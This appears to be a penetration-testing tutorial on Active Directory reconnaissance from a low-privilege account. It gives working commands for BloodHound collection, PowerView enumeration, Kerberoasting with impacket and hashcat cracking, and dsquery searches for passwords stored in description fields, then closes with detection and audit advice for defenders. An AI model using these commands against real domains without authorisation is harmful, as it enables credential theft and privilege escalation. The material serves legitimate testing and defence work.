Active Directory is the authentication and authorization backbone of most enterprise Windows environments. It’s also a goldmine of information that’s accessible to any authenticated domain user — including a low-privilege account obtained through phishing. Understanding what’s enumerable without elevated rights is fundamental to both penetration testing and understanding what you’re exposing.
Why AD Recon Matters
By design, domain users can query a significant portion of Active Directory. This is required for normal operations — computers need to find printers, users need to look up colleagues, applications need to resolve service accounts. The same queries that enable normal functionality give a foothold account the information needed to identify privilege escalation paths, map trust relationships, and find high-value targets.
BloodHound: The Standard
BloodHound visualizes Active Directory as a graph — nodes are users, computers, and groups; edges are relationships and permissions. Its key capability is finding attack paths: “what series of hops gets this low-privilege user to Domain Admin?”
The data collection piece is SharpHound (C# ingestor) or the Python version BloodHound.py (useful when you don’t want to run a binary on the target):
# Python collector from Linux, authenticated as domain user
bloodhound-python -u username -p password -d domain.local -dc dc01.domain.local -c All
SharpHound from a Windows foothold:
.\SharpHound.exe -c All --zipfilename output.zip
Import the resulting ZIP into BloodHound’s Neo4j-backed interface and run pre-built queries:
- “Find all Domain Admins”
- “Shortest path to Domain Admin from owned principals”
- “Find workstations where Domain Admins have sessions”
The last one is particularly valuable — Domain Admin sessions on workstations mean you can potentially steal credentials without ever touching a domain controller.
PowerView / LDAP Queries
PowerView is a PowerShell module for AD enumeration. Key functions:
# Import
Import-Module .\PowerView.ps1
Get-Domain
Get-DomainController
Get-DomainUser | select samaccountname, description, memberof
Get-DomainUser -SPN # service accounts (Kerberoastable)
Get-DomainGroup "Domain Admins" | select member
Get-DomainGroupMember "Domain Admins"
Get-DomainComputer | select name, operatingsystem, lastlogon
Get-DomainGPO | select displayname, gpcfilesyspath
Find-DomainUserLocation -UserGroupIdentity "Domain Admins"
Kerberoasting
Service accounts in AD often have Service Principal Names (SPNs) registered. Any domain user can request a Kerberos service ticket for these accounts, and that ticket is encrypted with the service account’s password hash — which means you can take it offline and crack it.
# With impacket (from Linux)
GetUserSPNs.py domain.local/username:password -dc-ip 10.X.X.X -request
hashcat -a 0 -m 13100 kerberoast_hashes.txt rockyou.txt
Service accounts often have weak passwords set years ago and rarely rotated. Kerberoasting against service accounts with SPNs is one of the most reliable paths from domain user to elevated credentials.
LDAP Queries Without Tools
If you can’t run tooling, raw LDAP queries from any domain-joined machine work:
# List all users
dsquery user -limit 0
dsquery group -name "Domain Admins" | dsget group -members
dsquery computer -limit 0
dsquery -filter "(&(objectclass=user)(description=password*))" -attr samaccountname description
The description field check catches a surprisingly common finding: service account passwords stored in the AD description field by administrators who found it convenient.
What Defenders Should Know
All of this enumeration generates LDAP queries that can be logged and alerted on. BloodHound collection in particular generates a distinctive pattern of queries that EDR and SIEM tools can detect. Defenders who understand what attack-path enumeration looks like can build detections around it.
Regularly audit what’s exposed: service accounts with SPNs and weak passwords, users in privileged groups who shouldn’t be, accounts with “AdminCount=1” that aren’t actually admin accounts, and stale computer objects that represent long-decommissioned machines with potentially reusable credentials.